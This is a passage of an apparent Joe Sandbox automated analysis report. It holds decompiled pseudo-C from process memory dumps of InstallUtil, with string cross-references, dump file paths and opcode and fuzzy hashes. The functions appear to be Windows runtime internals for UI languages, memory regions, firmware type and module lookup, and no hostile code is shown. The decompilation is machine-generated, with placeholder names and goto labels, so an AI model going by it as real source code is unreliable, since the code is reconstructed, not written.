                      													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
                      													goto L15;
                      												} else {
                      													asm("sbb edx, edx");
                      													_t114 = E01368938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
                      													__eflags = _t114;
                      													if(_t114 < 0) {
                      														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
                      														E012CB150();
                      													}
                      													_t116 = E01366D81(_t176,  &_v16);
                      													__eflags = _t116;
                      													if(_t116 >= 0) {
                      														__eflags = _v16 - 2;
                      														if(_v16 < 2) {
                      															L56:
                      															_t118 = E012D75CE(_v20, 5, 0);
                      															__eflags = _t118;
                      															if(_t118 < 0) {
                      																L67:
                      																_t130 = 0xc0000017;
                      																goto L32;
                      															} else {
                      																__eflags = _v12;
                      																if(_v12 == 0) {
                      																	goto L67;
                      																} else {
                      																	_t153 =  *0x13b8638; // 0x0
                      																	_t122 = L012D38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
                      																	_t154 = _v12;
                      																	_t130 = _t122;
                      																	__eflags = _t130;
                      																	if(_t130 >= 0) {
                      																		_t123 =  *(_t154 + 4) & 0x0000ffff;
                      																		__eflags = _t123;
                      																		if(_t123 != 0) {
                      																			_t155 = _a12;
                      																			__eflags = _t155;
                      																			if(_t155 != 0) {
                      																				 *_t155 = _t123;
                      																			}
                      																			goto L64;
                      																		} else {
                      																			E012D76E2(_t154);
                      																			goto L41;
                      																		}
                      																	} else {
                      																		E012D76E2(_t154);
                      																		_t177 = 0;
                      																		goto L18;
                      																	}
                      																}
                      															}
                      														} else {
                      															__eflags =  *_t176;
                      															if( *_t176 != 0) {
                      																goto L56;
                      															} else {
                      																__eflags =  *(_t176 + 2);
                      																if( *(_t176 + 2) == 0) {
                      																	goto L64;
                      																} else {
                      																	goto L56;
                      																}
                      															}
                      														}
                      													} else {
                      														_t130 = 0xc000000d;
                      														goto L32;
                      													}
                      												}
                      												goto L35;
                      											} else {
                      												__eflags = _a8;
                      												if(_a8 != 0) {
                      													_t77 = 0xc000000d;
                      												} else {
                      													_v5 = 1;
                      													L012FFCE3(_v20, _t170);
                      													_t177 = 0;
                      													__eflags = 0;
                      													L15:
                      													_t85 =  *[fs:0x18];
                      													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
                      													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
                      														L18:
                      														__eflags = _t130;
                      														if(_t130 != 0) {
                      															goto L32;
                      														} else {
                      															__eflags = _v5 - _t130;
                      															if(_v5 == _t130) {
                      																goto L32;
                      															} else {
                      																_t86 =  *[fs:0x18];
                      																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
                      																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
                      																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
                      																}
                      																__eflags = _t177;
                      																if(_t177 == 0) {
                      																	L31:
                      																	__eflags = 0;
                      																	L012D70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
                      																	goto L32;
                      																} else {
                      																	__eflags = _v24;
                      																	_t91 =  *(_t177 + 0x20);
                      																	if(_v24 != 0) {
                      																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
                      																		goto L31;
                      																	} else {
                      																		_t141 = _t91 & 0x00000040;
                      																		__eflags = _t170 & 0x00000100;
                      																		if((_t170 & 0x00000100) == 0) {
                      																			__eflags = _t141;
                      																			if(_t141 == 0) {
                      																				L74:
                      																				_t94 = _t91 & 0xfffffffd | 0x00000004;
                      																				goto L27;
                      																			} else {
                      																				_t177 = E012FFD22(_t177);
                      																				__eflags = _t177;
                      																				if(_t177 == 0) {
                      																					goto L42;
                      																				} else {
                      																					_t130 = E012FFD9B(_t177, 0, 4);
                      																					__eflags = _t130;
                      																					if(_t130 != 0) {
                      																						goto L42;
                      																					} else {
                      																						_t68 = _t177 + 0x20;
                      																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
                      																						__eflags =  *_t68;
                      																						_t91 =  *(_t177 + 0x20);
                      																						goto L74;
                      																					}
                      																				}
                      																			}
                      																			goto L35;
                      																		} else {
                      																			__eflags = _t141;
                      																			if(_t141 != 0) {
                      																				_t177 = E012FFD22(_t177);
                      																				__eflags = _t177;
                      																				if(_t177 == 0) {
                      																					L42:
                      																					_t77 = 0xc0000001;
                      																					goto L33;
                      																				} else {
                      																					_t130 = E012FFD9B(_t177, 0, 4);
                      																					__eflags = _t130;
                      																					if(_t130 != 0) {
                      																						goto L42;
                      																					} else {
                      																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
                      																						_t91 =  *(_t177 + 0x20);
                      																						goto L26;
                      																					}
                      																				}
                      																				goto L35;
                      																			} else {
                      																				L26:
                      																				_t94 = _t91 & 0xfffffffb | 0x00000002;
                      																				__eflags = _t94;
                      																				L27:
                      																				 *(_t177 + 0x20) = _t94;
                      																				__eflags = _t170 & 0x00008000;
                      																				if((_t170 & 0x00008000) != 0) {
                      																					_t95 = _a12;
                      																					__eflags = _t95;
                      																					if(_t95 != 0) {
                      																						_t96 =  *_t95;
                      																						__eflags = _t96;
                      																						if(_t96 != 0) {
                      																							 *((short*)(_t177 + 0x22)) = 0;
                      																							_t40 = _t177 + 0x20;
                      																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
                      																							__eflags =  *_t40;
                      																						}
                      																					}
                      																				}
                      																				goto L31;
                      																			}
                      																		}
                      																	}
                      																}
                      															}
                      														}
                      													} else {
                      														_t147 =  *( *[fs:0x18] + 0xfc0);
                      														_t106 =  *(_t147 + 0x20);
                      														__eflags = _t106 & 0x00000040;
                      														if((_t106 & 0x00000040) != 0) {
                      															_t147 = E012FFD22(_t147);
                      															__eflags = _t147;
                      															if(_t147 == 0) {
                      																L41:
                      																_t130 = 0xc0000001;
                      																L32:
                      																_t77 = _t130;
                      																goto L33;
                      															} else {
                      																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
                      																_t106 =  *(_t147 + 0x20);
                      																goto L17;
                      															}
                      															goto L35;
                      														} else {
                      															L17:
                      															_t108 = _t106 | 0x00000080;
                      															__eflags = _t108;
                      															 *(_t147 + 0x20) = _t108;
                      															 *( *[fs:0x18] + 0xfc0) = _t147;
                      															goto L18;
                      														}
                      													}
                      												}
                      											}
                      											L33:
                      										}
                      									}
                      								}
                      							}
                      						}
                      						L35:
                      						return _t77;
                      					} else {
                      						 *_t75 = 0x13b7b80;
                      						 *((intOrPtr*)(_t75 + 4)) = _t134;
                      						 *_t134 = _t75;
                      						 *0x13b7b84 = _t75;
                      						_t73 = E012DEB70(_t134, 0x13b7b60);
                      						if( *0x13b7b20 != 0) {
                      							_t73 =  *( *[fs:0x30] + 0xc);
                      							if( *((char*)(_t73 + 0x28)) == 0) {
                      								_t73 = E012DFF60( *0x13b7b20);
                      							}
                      						}
                      						goto L5;
                      					}
                      				}
                      			}

                      Strings
                      • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0133BE0F
                      • 1, xrefs: 012FFAF1
                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!$1
                      • API String ID: 0-464699016
                      • Opcode ID: d725692eaaf748019d6587c5a822b3d2403343c6a4b6e6f6544a1386e5f30b6f
                      • Instruction ID: cc48afb8e6f4adba6078d5cd3620f267142639f26746fd9da5d57fa5fc340ba5
                      • Opcode Fuzzy Hash: d725692eaaf748019d6587c5a822b3d2403343c6a4b6e6f6544a1386e5f30b6f
                      • Instruction Fuzzy Hash: A9A11372B206168BEB25CF6CC590B7AF7A4AF88714F04457DEB06CB694EB74D841CB90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 60%
                      			E0138E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
                      				signed int _v20;
                      				char _v24;
                      				signed int _v40;
                      				char _v44;
                      				intOrPtr _v48;
                      				signed int _v52;
                      				unsigned int _v56;
                      				char _v60;
                      				signed int _v64;
                      				char _v68;
                      				signed int _v72;
                      				void* __ebx;
                      				void* __edi;
                      				char _t87;
                      				signed int _t90;
                      				signed int _t94;
                      				signed int _t100;
                      				intOrPtr* _t113;
                      				signed int _t122;
                      				void* _t132;
                      				void* _t135;
                      				signed int _t139;
                      				signed int* _t141;
                      				signed int _t146;
                      				signed int _t147;
                      				void* _t153;
                      				signed int _t155;
                      				signed int _t159;
                      				char _t166;
                      				void* _t172;
                      				void* _t176;
                      				signed int _t177;
                      				intOrPtr* _t179;
                      
                      				_t179 = __ecx;
                      				_v48 = __edx;
                      				_v68 = 0;
                      				_v72 = 0;
                      				_push(__ecx[1]);
                      				_push( *__ecx);
                      				_push(0);
                      				_t153 = 0x14;
                      				_t135 = _t153;
                      				_t132 = E0138BBBB(_t135, _t153);
                      				if(_t132 == 0) {
                      					_t166 = _v68;
                      					goto L43;
                      				} else {
                      					_t155 = 0;
                      					_v52 = 0;
                      					asm("stosd");
                      					asm("stosd");
                      					asm("stosd");
                      					asm("stosd");
                      					asm("stosd");
                      					_v56 = __ecx[1];
                      					if( *__ecx >> 8 < 2) {
                      						_t155 = 1;
                      						_v52 = 1;
                      					}
                      					_t139 = _a4;
                      					_t87 = (_t155 << 0xc) + _t139;
                      					_v60 = _t87;
                      					if(_t87 < _t139) {
                      						L11:
                      						_t166 = _v68;
                      						L12:
                      						if(_t132 != 0) {
                      							E0138BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
                      						}
                      						L43:
                      						if(_v72 != 0) {
                      							_push( *((intOrPtr*)(_t179 + 4)));
                      							_push( *_t179);
                      							_push(0x8000);
                      							E0138AFDE( &_v72,  &_v60);
                      						}
                      						L46:
                      						return _t166;
                      					}
                      					_t90 =  *(_t179 + 0xc) & 0x40000000;
                      					asm("sbb edi, edi");
                      					_t172 = ( ~_t90 & 0x0000003c) + 4;
                      					if(_t90 != 0) {
                      						_push(0);
                      						_push(0x14);
                      						_push( &_v44);
                      						_push(3);
                      						_push(_t179);
                      						_push(0xffffffff);
                      						if(E01309730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
                      							_push(_t139);
                      							E0138A80D(_t179, 1, _v40, 0);
                      							_t172 = 4;
                      						}
                      					}
                      					_t141 =  &_v72;
                      					if(E0138A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
                      						_v64 = _a4;
                      						_t94 =  *(_t179 + 0xc) & 0x40000000;
                      						asm("sbb edi, edi");
                      						_t176 = ( ~_t94 & 0x0000003c) + 4;
                      						if(_t94 != 0) {
                      							_push(0);
                      							_push(0x14);
                      							_push( &_v24);
                      							_push(3);
                      							_push(_t179);
                      							_push(0xffffffff);
                      							if(E01309730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
                      								_push(_t141);
                      								E0138A80D(_t179, 1, _v20, 0);
                      								_t176 = 4;
                      							}
                      						}
                      						if(E0138A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
                      							goto L11;
                      						} else {
                      							_t177 = _v64;
                      							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
                      							_t100 = _v52 + _v52;
                      							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
                      							 *(_t132 + 0x10) = _t146;
                      							asm("bsf eax, [esp+0x18]");
                      							_v52 = _t100;
                      							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
                      							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
                      							_t47 =  &_a8;
                      							 *_t47 = _a8 & 0x00000001;
                      							if( *_t47 == 0) {
                      								E012E2280(_t179 + 0x30, _t179 + 0x30);
                      							}
                      							_t147 =  *(_t179 + 0x34);
                      							_t159 =  *(_t179 + 0x38) & 1;
                      							_v68 = 0;
                      							if(_t147 == 0) {
                      								L35:
                      								E012DB090(_t179 + 0x34, _t147, _v68, _t132);
                      								if(_a8 == 0) {
                      									E012DFFB0(_t132, _t177, _t179 + 0x30);
                      								}
                      								asm("lock xadd [eax], ecx");
                      								asm("lock xadd [eax], edx");
                      								_t132 = 0;
                      								_v72 = _v72 & 0;
                      								_v68 = _v72;
                      								if(E012E7D50() == 0) {
                      									_t113 = 0x7ffe0388;
                      								} else {
                      									_t177 = _v64;
                      									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                      								}
                      								if( *_t113 == _t132) {
                      									_t166 = _v68;
                      									goto L46;
                      								} else {
                      									_t166 = _v68;
                      									E0137FEC0(_t132, _t179, _t166, _t177 + 0x1000);
                      									goto L12;
                      								}
                      							} else {
                      								L23:
                      								while(1) {
                      									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
                      										_t122 =  *_t147;
                      										if(_t159 == 0) {
                      											L32:
                      											if(_t122 == 0) {
                      												L34:
                      												_v68 = 0;
                      												goto L35;
                      											}
                      											L33:
                      											_t147 = _t122;
                      											continue;
                      										}
                      										if(_t122 == 0) {
                      											goto L34;
                      										}
                      										_t122 = _t122 ^ _t147;
                      										goto L32;
                      									}
                      									_t122 =  *(_t147 + 4);
                      									if(_t159 == 0) {
                      										L27:
                      										if(_t122 != 0) {
                      											goto L33;
                      										}
                      										L28:
                      										_v68 = 1;
                      										goto L35;
                      									}
                      									if(_t122 == 0) {
                      										goto L28;
                      									}
                      									_t122 = _t122 ^ _t147;
                      									goto L27;
                      								}
                      							}
                      						}
                      					}
                      					_v72 = _v72 & 0x00000000;
                      					goto L11;
                      				}
                      			}





































                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID: `$`
                      • API String ID: 0-197956300
                      • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                      • Instruction ID: c2c0cf23900a5b78edcb0dfb03a89ff18bcdca1d59502357b8b4e7f390fca087
                      • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                      • Instruction Fuzzy Hash: 87916E312043429BE725EF29C945B1BBBE5BF84728F14892DF6A5CB290E774E904CB51
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 77%
                      			E013451BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                      				signed short* _t63;
                      				signed int _t64;
                      				signed int _t65;
                      				signed int _t67;
                      				intOrPtr _t74;
                      				intOrPtr _t84;
                      				intOrPtr _t88;
                      				intOrPtr _t94;
                      				void* _t100;
                      				void* _t103;
                      				intOrPtr _t105;
                      				signed int _t106;
                      				short* _t108;
                      				signed int _t110;
                      				signed int _t113;
                      				signed int* _t115;
                      				signed short* _t117;
                      				void* _t118;
                      				void* _t119;
                      
                      				_push(0x80);
                      				_push(0x13a05f0);
                      				E0131D0E8(__ebx, __edi, __esi);
                      				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
                      				_t115 =  *(_t118 + 0xc);
                      				 *(_t118 - 0x7c) = _t115;
                      				 *((char*)(_t118 - 0x65)) = 0;
                      				 *((intOrPtr*)(_t118 - 0x64)) = 0;
                      				_t113 = 0;
                      				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
                      				 *((intOrPtr*)(_t118 - 4)) = 0;
                      				_t100 = __ecx;
                      				if(_t100 == 0) {
                      					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                      					E012DEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                      					 *((char*)(_t118 - 0x65)) = 1;
                      					_t63 =  *(_t118 - 0x90);
                      					_t101 = _t63[2];
                      					_t64 =  *_t63 & 0x0000ffff;
                      					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                      					L20:
                      					_t65 = _t64 >> 1;
                      					L21:
                      					_t108 =  *((intOrPtr*)(_t118 - 0x80));
                      					if(_t108 == 0) {
                      						L27:
                      						 *_t115 = _t65 + 1;
                      						_t67 = 0xc0000023;
                      						L28:
                      						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
                      						L29:
                      						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
                      						E013453CA(0);
                      						return E0131D130(0, _t113, _t115);
                      					}
                      					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
                      						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
                      							 *_t108 = 0;
                      						}
                      						goto L27;
                      					}
                      					 *_t115 = _t65;
                      					_t115 = _t65 + _t65;
                      					E0130F3E0(_t108, _t101, _t115);
                      					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
                      					_t67 = 0;
                      					goto L28;
                      				}
                      				_t103 = _t100 - 1;
                      				if(_t103 == 0) {
                      					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
                      					_t74 = E012E3690(1, _t117, 0x12a1810, _t118 - 0x74);
                      					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
                      					_t101 = _t117[2];
                      					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                      					if(_t74 < 0) {
                      						_t64 =  *_t117 & 0x0000ffff;
                      						_t115 =  *(_t118 - 0x7c);
                      						goto L20;
                      					}
                      					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
                      					_t115 =  *(_t118 - 0x7c);
                      					goto L21;
                      				}
                      				if(_t103 == 1) {
                      					_t105 = 4;
                      					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
                      					 *((intOrPtr*)(_t118 - 0x70)) = 0;
                      					_push(_t118 - 0x70);
                      					_push(0);
                      					_push(0);
                      					_push(_t105);
                      					_push(_t118 - 0x78);
                      					_push(0x6b);
                      					 *((intOrPtr*)(_t118 - 0x64)) = E0130AA90();
                      					 *((intOrPtr*)(_t118 - 0x64)) = 0;
                      					_t113 = L012E4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
                      					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
                      					if(_t113 != 0) {
                      						_push(_t118 - 0x70);
                      						_push( *((intOrPtr*)(_t118 - 0x70)));
                      						_push(_t113);
                      						_push(4);
                      						_push(_t118 - 0x78);
                      						_push(0x6b);
                      						_t84 = E0130AA90();
                      						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
                      						if(_t84 < 0) {
                      							goto L29;
                      						}
                      						_t110 = 0;
                      						_t106 = 0;
                      						while(1) {
                      							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
                      							 *(_t118 - 0x88) = _t106;
                      							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
                      								break;
                      							}
                      							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
                      							_t106 = _t106 + 1;
                      						}
                      						_t88 = E0134500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
                      						_t119 = _t119 + 0x1c;
                      						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
                      						if(_t88 < 0) {
                      							goto L29;
                      						}
                      						_t101 = _t118 - 0x3c;
                      						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
                      						goto L21;
                      					}
                      					_t67 = 0xc0000017;
                      					goto L28;
                      				}
                      				_push(0);
                      				_push(0x20);
                      				_push(_t118 - 0x60);
                      				_push(0x5a);
                      				_t94 = E01309860();
                      				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
                      				if(_t94 < 0) {
                      					goto L29;
                      				}
                      				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
                      					_t101 = L"Legacy";
                      					_push(6);
                      				} else {
                      					_t101 = L"UEFI";
                      					_push(4);
                      				}
                      				_pop(_t65);
                      				goto L21;
                      			}























                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID: Legacy$UEFI
                      • API String ID: 2994545307-634100481
                      • Opcode ID: a9b9867d55d8e2ca1a3c31e3ff491f79da35ef70d32e788c02e3b47eafd8f722
                      • Instruction ID: f8bb6fad4bbfacba8d9ea7429b6a35423e2a7c85cc473b466d8d2e75a4631a06
                      • Opcode Fuzzy Hash: a9b9867d55d8e2ca1a3c31e3ff491f79da35ef70d32e788c02e3b47eafd8f722
                      • Instruction Fuzzy Hash: 40515C71E006099FDB25DFA8C850BAEBBF8FF48708F14406EE649EB291D671A940CB50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 87%
                      			E012DD5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
                      				signed int _v8;
                      				intOrPtr _v20;
                      				signed int _v36;
                      				intOrPtr* _v40;
                      				signed int _v44;
                      				signed int _v48;
                      				signed char _v52;
                      				signed int _v60;
                      				signed int _v64;
                      				signed int _v68;
                      				signed int _v72;
                      				signed int _v76;
                      				intOrPtr _v80;
                      				signed int _v84;
                      				intOrPtr _v100;
                      				intOrPtr _v104;
                      				signed int _v108;
                      				signed int _v112;
                      				signed int _v116;
                      				intOrPtr _v120;
                      				signed int _v132;
                      				char _v140;
                      				char _v144;
                      				char _v157;
                      				signed int _v164;
                      				signed int _v168;
                      				signed int _v169;
                      				intOrPtr _v176;
                      				signed int _v180;
                      				signed int _v184;
                      				intOrPtr _v188;
                      				signed int _v192;
                      				signed int _v200;
                      				signed int _v208;
                      				intOrPtr* _v212;
                      				char _v216;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				void* __ebp;
                      				signed int _t204;
                      				signed int _t206;
                      				void* _t208;
                      				signed int _t211;
                      				signed int _t216;
                      				intOrPtr _t217;
                      				intOrPtr* _t218;
                      				signed int _t226;
                      				signed int _t239;
                      				signed int* _t247;
                      				signed int _t249;
                      				void* _t252;
                      				signed int _t256;
                      				signed int _t269;
                      				signed int _t271;
                      				signed int _t277;
                      				signed int _t279;
                      				intOrPtr _t283;
                      				signed int _t287;
                      				signed int _t288;
                      				void* _t289;
                      				signed char _t290;
                      				signed int _t292;
                      				signed int* _t293;
                      				unsigned int _t297;
                      				signed int _t306;
                      				signed int _t307;
                      				signed int _t308;
                      				signed int _t309;
                      				signed int _t310;
                      				intOrPtr _t311;
                      				intOrPtr _t312;
                      				signed int _t319;
                      				signed int _t320;
                      				signed int* _t324;
                      				signed int _t337;
                      				signed int _t338;
                      				signed int _t339;
                      				signed int* _t340;
                      				void* _t341;
                      				signed int _t344;
                      				signed int _t348;
                      				signed int _t349;
                      				signed int _t351;
                      				intOrPtr _t353;
                      				void* _t354;
                      				signed int _t356;
                      				signed int _t358;
                      				intOrPtr _t359;
                      				signed int _t361;
                      				signed int _t363;
                      				signed short* _t365;
                      				void* _t367;
                      				intOrPtr _t369;
                      				void* _t370;
                      				signed int _t371;
                      				signed int _t372;
                      				void* _t374;
                      				signed int _t376;
                      				void* _t384;
                      				signed int _t387;
                      
                      				_v8 =  *0x13bd360 ^ _t376;
                      				_t2 =  &_a20;
                      				 *_t2 = _a20 & 0x00000001;
                      				_t287 = _a4;
                      				_v200 = _a12;
                      				_t365 = _a8;
                      				_v212 = _a16;
                      				_v180 = _a24;
                      				_v168 = 0;
                      				_v157 = 0;
                      				if( *_t2 != 0) {
                      					__eflags = E012D6600(0x13b52d8);
                      					if(__eflags == 0) {
                      						goto L1;
                      					} else {
                      						_v188 = 6;
                      					}
                      				} else {
                      					L1:
                      					_v188 = 9;
                      				}
                      				if(_t365 == 0) {
                      					_v164 = 0;
                      					goto L5;
                      				} else {
                      					_t363 =  *_t365 & 0x0000ffff;
                      					_t341 = _t363 + 1;
                      					if((_t365[1] & 0x0000ffff) < _t341) {
                      						L109:
                      						__eflags = _t341 - 0x80;
                      						if(_t341 <= 0x80) {
                      							_t281 =  &_v140;
                      							_v164 =  &_v140;
                      							goto L114;
                      						} else {
                      							_t283 =  *0x13b7b9c; // 0x0
                      							_t281 = L012E4620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
                      							_v164 = _t281;
                      							__eflags = _t281;
                      							if(_t281 != 0) {
                      								_v157 = 1;
                      								L114:
                      								E0130F3E0(_t281, _t365[2], _t363);
                      								_t200 = _v164;
                      								 *((char*)(_v164 + _t363)) = 0;
                      								goto L5;
                      							} else {
                      								_t204 = 0xc000009a;
                      								goto L47;
                      							}
                      						}
                      					} else {
                      						_t200 = _t365[2];
                      						_v164 = _t200;
                      						if( *((char*)(_t200 + _t363)) != 0) {
                      							goto L109;
                      						} else {
                      							while(1) {
                      								L5:
                      								_t353 = 0;
                      								_t342 = 0x1000;
                      								_v176 = 0;
                      								if(_t287 == 0) {
                      									break;
                      								}
                      								_t384 = _t287 -  *0x13b7b90; // 0x77460000
                      								if(_t384 == 0) {
                      									_t353 =  *0x13b7b8c; // 0xe62aa0
                      									_v176 = _t353;
                      									_t320 = ( *(_t353 + 0x50))[8];
                      									_v184 = _t320;
                      								} else {
                      									E012E2280(_t200, 0x13b84d8);
                      									_t277 =  *0x13b85f4; // 0xe62f90
                      									_t351 =  *0x13b85f8 & 1;
                      									while(_t277 != 0) {
                      										_t337 =  *(_t277 - 0x50);
                      										if(_t337 > _t287) {
                      											_t338 = _t337 | 0xffffffff;
                      										} else {
                      											asm("sbb ecx, ecx");
                      											_t338 =  ~_t337;
                      										}
                      										_t387 = _t338;
                      										if(_t387 < 0) {
                      											_t339 =  *_t277;
                      											__eflags = _t351;
                      											if(_t351 != 0) {
                      												__eflags = _t339;
                      												if(_t339 == 0) {
                      													goto L16;
                      												} else {
                      													goto L118;
                      												}
                      												goto L151;
                      											} else {
                      												goto L16;
                      											}
                      											goto L17;
                      										} else {
                      											if(_t387 <= 0) {
                      												__eflags = _t277;
                      												if(_t277 != 0) {
                      													_t340 =  *(_t277 - 0x18);
                      													_t24 = _t277 - 0x68; // 0xe62f28
                      													_t353 = _t24;
                      													_v176 = _t353;
                      													__eflags = _t340[3] - 0xffffffff;
                      													if(_t340[3] != 0xffffffff) {
                      														_t279 =  *_t340;
                      														__eflags =  *(_t279 - 0x20) & 0x00000020;
                      														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
                      															asm("lock inc dword [edi+0x9c]");
                      															_t340 =  *(_t353 + 0x50);
                      														}
                      													}
                      													_v184 = _t340[8];
                      												}
                      											} else {
                      												_t339 =  *(_t277 + 4);
                      												if(_t351 != 0) {
                      													__eflags = _t339;
                      													if(_t339 == 0) {
                      														goto L16;
                      													} else {
                      														L118:
                      														_t277 = _t277 ^ _t339;
                      														goto L17;
                      													}
                      													goto L151;
                      												} else {
                      													L16:
                      													_t277 = _t339;
                      												}
                      												goto L17;
                      											}
                      										}
                      										goto L25;
                      										L17:
                      									}
                      									L25:
                      									E012DFFB0(_t287, _t353, 0x13b84d8);
                      									_t320 = _v184;
                      									_t342 = 0x1000;
                      								}
                      								if(_t353 == 0) {
                      									break;
                      								} else {
                      									_t366 = 0;
                      									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
                      										_t288 = _v164;
                      										if(_t353 != 0) {
                      											_t342 = _t288;
                      											_t374 = E0131CC99(_t353, _t288, _v200, 1,  &_v168);
                      											if(_t374 >= 0) {
                      												if(_v184 == 7) {
                      													__eflags = _a20;
                      													if(__eflags == 0) {
                      														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
                      														if(__eflags != 0) {
                      															_t271 = E012D6600(0x13b52d8);
                      															__eflags = _t271;
                      															if(__eflags == 0) {
                      																_t342 = 0;
                      																_v169 = _t271;
                      																_t374 = E012D7926( *(_t353 + 0x50), 0,  &_v169);
                      															}
                      														}
                      													}
                      												}
                      												if(_t374 < 0) {
                      													_v168 = 0;
                      												} else {
                      													if( *0x13bb239 != 0) {
                      														_t342 =  *(_t353 + 0x18);
                      														E0134E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
                      													}
                      													if( *0x13b8472 != 0) {
                      														_v192 = 0;
